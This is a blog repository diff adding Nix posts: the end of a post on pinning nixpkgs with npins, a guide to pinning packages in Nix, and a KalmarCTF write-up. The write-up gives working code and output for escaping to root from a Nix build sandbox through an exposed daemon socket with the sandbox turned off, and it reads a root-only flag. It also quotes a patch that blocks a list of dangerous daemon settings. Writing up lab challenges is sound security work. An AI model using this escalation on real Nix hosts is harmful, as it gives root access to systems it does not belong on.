nixpkgs#hello` give you the same `hello` every time: it will always be the same
one as if you put it in `systemPackages`. That setup works by setting
`NIX_PATH` to refer to the flake registry `/etc/nix/registry.json`, which then
is set to resolve `nixpkgs` to `/nix/store/xxx-source`, that is, the nixpkgs of
the current configuration.
We can bring the same niceness to non-flake configurations, with the exact same
code behind it, even!
Let's fix the `NIX_PATH`. Add this module worth of code into your config
somewhere, say, `pinning.nix`, then add it to `imports` of `configuration.nix`:
```nix
{ config, pkgs, ... }:
let sources = import ./npins;
in {
# We need the flakes experimental feature to do the NIX_PATH thing cleanly
# below. Given that this is literally the default config for flake-based
# NixOS installations in the upcoming NixOS 24.05, future Nix/Lix releases
# will not get away with breaking it.
nix.settings = {
experimental-features = "nix-command flakes";
};
# FIXME(24.05 or nixos-unstable): change following two rules to
#
# nixpkgs.flake.source = sources.nixpkgs;
#
# which does the exact same thing, using the same machinery as flake configs
# do as of 24.05.
nix.registry.nixpkgs.to = {
type = "path";
path = sources.nixpkgs;
};
nix.nixPath = ["nixpkgs=flake:nixpkgs"];
}
```
# New workflow
When you want to update NixOS, use `npins update`, then `./rebuild.sh`
(`./rebuild.sh dry-build` to check it evaluates, `./rebuild.sh boot` to switch
on next boot, etc). If it works, commit it to Git. The version of nixpkgs comes
from exactly one place now, and it is tracked along with the changes to your
configuration. Builds are faster now since we don't evaluate the configuration
multiple times.
Multiple machines can no longer get desynchronized with each other. Config
commits *will* build to the same result in the future, since they are
self-contained now.
# Conclusion and analysis
We really need to improve `nixos-rebuild` as the NixOS development community.
It embodies, at basically every juncture, obsolescent practices that confuse
users and waste time. Modern configurations should be using either
npins/equivalent or flakes, both of which should be equally valid and easy to
use choices in all our tooling.
Flags like `--no-rebuild-nix` come from an era where people were building
flake-based configs from a Nix that didn't even *have* flakes, so they needed
to be able to switch to an entirely different *Nix* to be able to evaluate
their config. We should never be rebuilding Nix by default before re-evaluating
the configuration in 2024. The Nix language is much, much more stable these
days, almost frozen like a delicious ice cream cone, and so the idea of
someone's config requiring a brand new Nix to merely evaluate is bordering on
absurd.
It doesn't help that this old flakes hack actually breaks cross compiling
NixOS configs, for which `--fast` is thus mandatory. The re-execution of
`nixos-rebuild` is more excusable since there is [still work to do on that like
capturing output to the journal](https://github.com/NixOS/nixpkgs/pull/287968),
but it is still kind of bothersome to eat so much evaluation time about it; I
wonder if a happier medium is that it would just build `pkgs.nixos-rebuild`
instead of evaluating all the modules, but that has its own drawback of ignoring
overlays in the NixOS config...
Another tool that [needs rewriting, documentedly
so](https://github.com/NixOS/nixpkgs/issues/293543) is `nixos-option`, which is
a bad pile of C++ that doesn't support flakes, and which could be altogether
replaced by a short bit of very normal Nix code and a shell script.
There's a lot of work still to do on making NixOS and Nix a more friendly
toolset, and we hope you can join us. I (Jade) have been working along with
several friends on <https://lix.systems>, a soon-to-be-released fork of CppNix
2.18 focused on friendliness, stability, and future evolution. People
in our community have been working on these UX problems outside Nix itself
as well. We would love for these tools to be better for everyone.

View file

@ -0,0 +1,310 @@
+++
date = "2024-05-19"
draft = false
path = "/blog/pinning-packages-in-nix"
tags = ["nix"]
title = "Pinning packages in Nix"
+++
Although Nix supposedly makes pinning things easy, it really does not seem so
from a perspective of looking at other software using pinning: it is not
possible to simply write `package = "^5.0.1"` in some file somewhere and get
*one* package pinned at a specific version. Though this is frustrating, there
is a reason for this, and it primarily speaks to how nixpkgs is a Linux
distribution and how Nix is unlike a standard language package manager.
This post will go through the ways to pin a package to some older version and
why one would use each method.
# Simply add an older version of nixpkgs
> Software regressed? No patches in master to fix it? Try 30-40 different
versions of nixpkgs. An easy weeknight bug fix. You will certainly not regret
pinning 30-40 versions of nixpkgs.
Unlike most systems, it is fine to mix versions of nixpkgs, although it will
likely go wrong if, e.g. libraries are intermingled between versions (*in
particular*, it is inadvisable to replace some program with a version
from a different nixpkgs from within an overlay for this reason). But, if one
package is all that is necessary, one can in fact simply import another version
of nixpkgs.
This works because binaries from multiple versions of nixpkgs can coexist
on a computer and simply work. However, it can go wrong if they are loading
libraries at runtime, especially if the glibc version changes, especially if
`LD_LIBRARY_PATH` is involved. That failure mode is, however, rather loud and
obvious if it happens.
For example:
```nix
let
pkgs1Src = builtins.fetchTarball {
# https://github.com/nixos/nixpkgs/tree/nixos-23.11
url = "https://github.com/nixos/nixpkgs/archive/219951b495fc2eac67b1456824cc1ec1fd2ee659.tar.gz";
sha256 = "sha256-u1dfs0ASQIEr1icTVrsKwg2xToIpn7ZXxW3RHfHxshg=";
name = "source";
};
pkgs2Src = fetchTarball {
# https://github.com/nixos/nixpkgs/tree/nixos-unstable
url = "https://github.com/nixos/nixpkgs/archive/d8fe5e6c92d0d190646fb9f1056741a229980089.tar.gz";
sha256 = "sha256-iMUFArF0WCatKK6RzfUJknjem0H9m4KgorO/p3Dopkk=";
name = "source";
};
pkgs1 = import pkgs1Src { };
pkgs2 = import pkgs2Src { };
in
{
env = pkgs1.buildEnv {
name = "env";
paths = [ pkgs1.vim pkgs2.hello ];
};
vim1 = pkgs1.vim;
vim2 = pkgs2.vim;
}
```
Here we have an environment which is being built out of packages from two
different versions of nixpkgs, so that `result/bin/hello` is from `pkgs2` and
`result/bin/vim` is from `pkgs1`. This can equivalently be done for
`environment.systemPackages` or similar such things: to get another version of
nixpkgs into a NixOS configuration, one can:
- For flakes, one can inject the dependency [in some manner suggested by
"Flakes aren't real"][flakes-arent-real]. Or, one can do the
`builtins.fetchTarball` thing above.
- For non-flakes, one can do the `builtins.fetchTarball` thing shown above, or
add another input in [`npins`][npins]/Niv/etc, or add a second channel
(though we suggest migrating NixOS configs using channels to npins or
flakes so that the nixpkgs version is tracked in git).
[flakes-arent-real]: https://jade.fyi/blog/flakes-arent-real/
[npins]: https://github.com/andir/npins
```
» nix-build -A env /tmp/meow.nix
/nix/store/zilav8lqqgfgrk54wg88mdwq582hqdp9-env
~ » ./result/bin/hello --version | head -n1
hello (GNU Hello) 2.12.1
» ./result/bin/vim --version | head -n3
VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Jan 01 1980 00:00:00)
Included patches: 1-2116
Compiled by nixbld
» nix eval -f /tmp/meow.nix vim1.version
"9.0.2116"
» nix eval -f /tmp/meow.nix vim2.version
"9.1.0148"
```
<dl>
<dt>Difficulty</dt>
<dd>Very easy</dd>
<dt>Rebuilds</dt>
<dd>
None, but will bring in another copy of nixpkgs and any dependencies (and
transitive dependencies).
</dd>
</dl>
# Vendor the package
Another way to pin one package is to vendor the package definition of the
relevant version. The easiest way to do this is to find the version of nixpkgs
with the desired package version and then copy the `package.nix` or
`default.nix` or such into your own project, and then call it with
`callPackage`.
You can find it with something like:
```
» nix eval --raw -f '<nixpkgs>' hello.meta.position
/nix/store/0qd773b63yg8435w8hpm13zqz7iipcbs-source/pkgs/by-name/he/hello/package.nix:41
```
Or, equivalently, with `nix repl -f '<nixpkgs>'`, `:e hello` or to do the same
as above, `hello.meta.position`.
Then, vendor that file into your configurations repository.
Once it is vendored, it can be used either from an overlay:
```nix
final: prev: {
hello = final.callPackage ./hello-vendored.nix { };
}
```
or directly in your use site:
```nix
{ pkgs, ... }: {
environment.systemPackages = [
(pkgs.callPackage ./vendored-hello.nix { })
];
}
```
<dl>
<dt>Difficulty</dt>
<dd>Slight effort</dd>
<dt>Rebuilds</dt>
<dd>
For the overlay use case, this will build the overridden package and anything
depending on it. For the direct at use site case, this will just rebuild the
package, and anything depending on it will get the version in upstream nixpkgs.
</dd>
</dl>
# Patch the package with overrides
nixpkgs offers several separate methods to "override" things that mean
different things. In short:
- [`somePackage.override`][override] replaces the dependencies of a package;
more specifically the dependencies injected by `callPackage`. It accepts an
attribute set but can also accept a lambda of one argument, providing the
previous dependencies of the package.
- [`somePackage.overrideAttrs`][overrideAttrs] replaces the `stdenv.mkDerivation`
arguments of a package. This lets you replace the `src` of a package, in
principle.
- [`overrideCabal`][overrideCabal] replaces the `haskellPackages.mkDerivation`
arguments for a Haskell package in a similar way that `overrideAttrs` does for
`stdenv.mkDerivation`. This is internally implemented by methods equivalent
to the evil crimes below.
[override]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-override
[overrideAttrs]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-overrideAttrs
[overrideCabal]: https://nixos.org/manual/nixpkgs/stable/#haskell-overriding-haskell-packages
Here are some examples:
Build an openttd with a different upstream source by putting this in
`openttd-jgrpp.nix`:
```nix
{ openttd, fetchFromGitHub }:
openttd.overrideAttrs (old: {
src = fetchFromGitHub {
owner = "jgrennison";
repo = "openttd-patches";
rev = "jgrpp-0.57.1";
sha256 = "sha256-mQy+QdhEXoM9wIWvSkMgRVBXJO1ugXWS3lduccez1PQ=";
};
})
```
then `pkgs.callPackage ./openttd-jgrpp.nix { }`.
For instance, the following (rather silly) command will build such a file:
```
» nix build -L --impure --expr 'with import <nixpkgs> {}; callPackage ./openttd-jgrpp.nix {}'
```
## Limitations
Most notably, [overrideAttrs doesn't work][overrideAttrs-busted] on several
significant language ecosystems including Rust and Go, since one almost always
needs to override the arguments of `buildRustPackage` or `buildGoPackage` when
replacing something. For these, either one can do crimes to introduce an
`overrideRust` function (see below), or one can cry briefly and then vendor the
package. The latter is easier.
```nix
let
pkgs = import <nixpkgs> { };
# Give the package a fake buildRustPackage from callPackage that modifies the
# arguments through a function.
overrideRust = f: drv: drv.override (oldArgs:
let rustPlatform = oldArgs.rustPlatform or pkgs.rustPlatform;
in oldArgs // {
rustPlatform = rustPlatform // {
buildRustPackage = args: rustPlatform.buildRustPackage (f args);
};
});
# Take some arguments to buildRustPackage and make new ones. In this case,
# override the version and the hash
evil = oldArgs: oldArgs // {
src = oldArgs.src.override {
rev = "v0.20.9";
sha256 = "sha256-NxWqpMNwu5Ajffw1E2q9KS4TgkCH6M+ctFyi9Jp0tqQ=";
};
version = "master";
# FIXME: if you are actually doing this put a real hash here
cargoSha256 = pkgs.lib.fakeHash;
};
in
{
x = overrideRust evil pkgs.tree-sitter;
}
```
[overrideAttrs-busted]: https://github.com/NixOS/nixpkgs/issues/99100
Then: `nix build -L -f evil.nix x`
<dl>
<dt>Difficulty</dt>
<dd>Highly variable, sometimes trivial, sometimes nearly impossible, depending
on architectural flaws of nixpkgs.</dd>
<dt>Rebuilds</dt>
<dd>
For the overlay use case of actually using this overridden package, this will
build the overridden package and anything depending on it. For the direct at
use site case, this will just rebuild the package, and anything depending on it
will get the version in upstream nixpkgs.
</dd>
</dl>
# Patch a NixOS module
If one wants to replace a NixOS module, say, by getting it from a later version
of nixpkgs, see [Replacing Modules] in the NixOS manual.
[Replacing Modules]: https://nixos.org/manual/nixos/stable/#sec-replace-modules
# Patch the base system without a world rebuild
It's possible to replace an entire store path with another inside a NixOS
system without rebuilding the world (but wasting some space (by duplicating
things for the rewritten version) and being somewhat evil/potentially unsound
since it is just a text replacement of the hashes). This can be achieved with
the NixOS option
[`system.replaceRuntimeDependencies`][replaceRuntimeDependencies].
[replaceRuntimeDependencies]: https://nixos.org/manual/nixos/stable/options#opt-system.replaceRuntimeDependencies
# Why do we need all of this?
The primary reason that Nix doesn't allow trivially overriding packages with a
different version is that it is a generalized build system building software
that has non-uniform expectations of how to be built. One can indeed see
that the "replace one version with some other in some file" idea is *almost*
reality in languages that use `mkDerivation` directly, though one might have to
tweak other build properties sometimes. Architectural problems in nixpkgs
prevent this working for several ecosystems, though.
Another sort of issue is that nixpkgs tries to provide a mostly [globally
coherent] set of software versions, where, like most Linux distributions, there
is generally one blessed version of a library with some exceptions. This is, in
fact, mandatory to be able to have any cache hits as a hermetic build system:
if everyone was building slightly different versions of libraries, all
downstream packages will have different hashes and thus miss the cache.
So, in a way, a software distribution based on Nix cannot have separate locking
for every package and simultaneously have functional caches: the moment that
everything is not built together, caches will miss.
[globally coherent]: https://www.haskellforall.com/2022/05/the-golden-rule-of-software.html

View file

@ -0,0 +1,295 @@
+++
date = "2024-03-16"
draft = false
path = "/blog/reproducible-pwning-writeup"
tags = ["ctf", "nix"]
title = "KalmarCTF: Reproducible Pwning writeup"
+++
I was making memes in the CTF room until someone told me Nix showed up
on a CTF, and well. It doesn't take that much to tempt me.
Reproducible Pwning is a challenge written by
[niko](https://hachyderm.io/@nrab), which involves a NixOS VM you're supposed
to root. The build user is not notably privileged.
There is a flag in `/data` which is mounted from the host via some means. That
directory is only readable by root.
There is a patch to the Nix evaluator. Interesting:
```patch
diff --git a/src/libutil/config.cc b/src/libutil/config.cc
index 37f5b50c7..fd824ee03 100644
--- a/src/libutil/config.cc
+++ b/src/libutil/config.cc
@@ -1,3 +1,4 @@
+#include "logging.hh"
#include "config.hh"
#include "args.hh"
#include "abstract-setting-to-json.hh"
@@ -17,6 +18,16 @@ Config::Config(StringMap initials)
bool Config::set(const std::string & name, const std::string & value)
{
+ if (name.find("build-hook") != std::string::npos
+ || name == "accept-flake-config"
+ || name == "allow-new-privileges"
+ || name == "impure-env") {
+ logWarning({
+ .msg = hintfmt("Option '%1%' is too dangerous, skipping.", name)
+ });
+ return true;
+ }
+
bool append = false;
auto i = _settings.find(name);
if (i == _settings.end()) {
```
The machine is configured with the following NixOS module, which I pulled out
of the included flake. The rest of the flake is normal stuff. There are a few
things that stand out to me:
- sudo is disabled, polkit is disabled: we are probably not looking for some
setuid exploit
- There are some *extremely* nonstandard Nix config settings being applied
```nix
({pkgs, ...}: {
nixpkgs.hostPlatform = "x86_64-linux";
nixpkgs.overlays = [
(final: prev: {
# JADE: likely vulnerable to puck's CVE, but I doubt that is the bug cuz they
# added a patch and there is other funny business up.
nix = final.nixVersions.nix_2_13.overrideAttrs {
patches = [./nix.patch];
# JADE: due to broken integration tests, almost certainly
doInstallCheck = false;
};
})
];
# JADE: no interesting setuid binaries
security = {
sudo.enable = false;
polkit.enable = false;
};
systemd.services.nix-daemon.serviceConfig.EnvironmentFile = let
# JADE: here is the wacky part of the config.
# This exposes the Nix daemon socket inside the sandbox (this is mostly
# never the case unless using recursive-nix). So we are going to
# be running a nix build inside a nix build to do something.
sandbox = pkgs.writeText "nix-daemon-config" ''
extra-sandbox-paths = /tmp/daemon=/nix/var/nix/daemon-socket/socket
'';
# JADE: I don't know what this does, so we are going to be reading some C++Nix
# source code. But it sure smells like running the build as root.
buildug = pkgs.writeText "nix-daemon-config" ''
build-users-group =
'';
in
# JADE: Sets additional config files to only the nix daemon. This is
# documented in the Nix manual.
pkgs.writeText "env" ''
NIX_USER_CONF_FILES=${sandbox}:${buildug}
'';
})
```
Here is the rest of the module which is uninteresting:
{% codesample(desc="`boring-module.nix`") %}
```nix
{ ... }: {
# JADE: what the heck is this? It seems like some kind of kernel-problems
# storage thing. Later found out this is nothing.
environment.etc."systemd/pstore.conf".text = ''
[PStore]
Unlink=no
'';
users.users.root.initialHashedPassword = "x";
users.users.user = {
isNormalUser = true;
initialHashedPassword = "";
group = "user";
};
users.groups.user = {};
system.stateVersion = "22.04";
services.openssh = {
enable = true;
settings.PermitRootLogin = "no";
};
# JADE: save some image size
environment.noXlibs = true;
documentation.man.enable = false;
documentation.doc.enable = false;
fonts.fontconfig.enable = false;
nix.settings = {
# JADE: this option has no interesting security impact, just whether you
# can build during evaluation phase.
allow-import-from-derivation = false;
experimental-features = ["flakes" "nix-command" "repl-flake" "no-url-literals"];
};
}
```
{% end %}
So, to sum up:
- We have a Nix daemon socket in the sandbox.
- We are running builds with some weird group.
- Several config settings that make trusted users effectively root are
blocked by the patch. Interesting. We probably become a trusted user then.
So like, let's run some build.
```nix
let
nixpkgs = builtins.fetchTarball {
url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz";
"sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h";
};
pkgs = import nixpkgs {};
in
pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } ''
id -a
''
```
This gives me:
```
this derivation will be built:
/nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv
building '/nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv'...
uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld)
```
Hm. Boring, I was expecting to be root already.
But, why is there a socket in there? Let's try invoking another build inside
our build, maybe? And, based on the assumption we must be trusted user (since I
can't think of any other reason interaction with the bind-mounted socket would
be different from inside the sandbox), let's try just turning off the sandbox
in the inner build and see what happens?
```nix
let
nixpkgs = builtins.fetchTarball {
url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz";
"sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h";
};
pkgs = import nixpkgs {};
# dont worry about the contents quite yet
hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix);
in
pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } ''
id -a
nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax}
''
```
and `stage2.nix`:
```nix
let
pkgs = import (builtins.getEnv "PKGS") { };
in
pkgs.runCommand "meow2" { } ''
echo MEOW2
id -a
''
```
This outputs:
```
this derivation will be built:
/nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv
building '/nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv'...
uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld)
this derivation will be built:
/nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv
building '/nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv'...
MEOW2
uid=0(root) gid=0(root) groups=0(root)
```
Welp, I am root. Change stage 2 to `cat /data/*` and we have a flag:
```
[user@nixos:~]$ cat >stage1.nix <<-'EOF'
> let
nixpkgs = builtins.fetchTarball {
url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz";
"sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h";
};
pkgs = import nixpkgs {};
hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix);
in
pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } ''
id -a
nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax}
''
> EOF
[user@nixos:~]$ cat >stage2.nix <<-'EOF'
> let
pkgs = import (builtins.getEnv "PKGS") { };
in
pkgs.runCommand "meow2" { } ''
echo MEOW2
id -a
ls / || true
ls /data || true
cat /data/*
''
> EOF
[user@nixos:~]$ nix-build stage1.nix
warning: Nix search path entry '/nix/var/nix/profiles/per-user/root/channels' does not exist, ignoring
these 2 derivations will be built:
/nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv
/nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv
these 11 paths will be fetched (3.92 MiB download, 23.41 MiB unpacked):
<SNIP>
building '/nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv'...
warning: Option 'accept-flake-config' is too dangerous, skipping.
warning: Option 'allow-new-privileges' is too dangerous, skipping.
warning: Option 'build-hook' is too dangerous, skipping.
warning: Option 'post-build-hook' is too dangerous, skipping.
warning: Option 'pre-build-hook' is too dangerous, skipping.
building '/nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv'...
uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld)
this derivation will be built:
/nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv
warning: Option 'accept-flake-config' is too dangerous, skipping.
warning: Option 'allow-new-privileges' is too dangerous, skipping.
warning: Option 'build-hook' is too dangerous, skipping.
warning: Option 'post-build-hook' is too dangerous, skipping.
warning: Option 'pre-build-hook' is too dangerous, skipping.
building '/nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv'...
MEOW2
uid=0(root) gid=0(root) groups=0(root)
bin dev home lib64 proc run sys usr
data etc lib nix root srv tmp var
flag
kalmar{0nlyReproduc1bleMisconfigurationsH3R3}
```
I was informed later that I found an unintended solution, and one was not
supposed to "simply set `sandbox = false`". The intended solution was to either
use the `diff-hook` setting which is run as the daemon's user (like
`post-build-hook` and `build-hook` which were conspicuously also banned), or
abuse being root to tamper with the inputs to the derivation and overwriting
something run by a privileged user.
I don't think the unintended solution was that bad, though, because once you
are trusted user, it is assumed in the Nix codebase that you can just root the
box.

View file

@ -17,6 +17,8 @@
<!-- <meta name="description" content="{{ config.description }}"> -->
<meta property="og:description" content="{{ config.description }}" />
<link href="https://hachyderm.io/@leftpaddotpy" rel="me">
<title>{{ config.title }}</title>
<meta property="og:title" content="{{ config.title }}" />
<meta property="og:url" content="{{ current_url | safe }}" />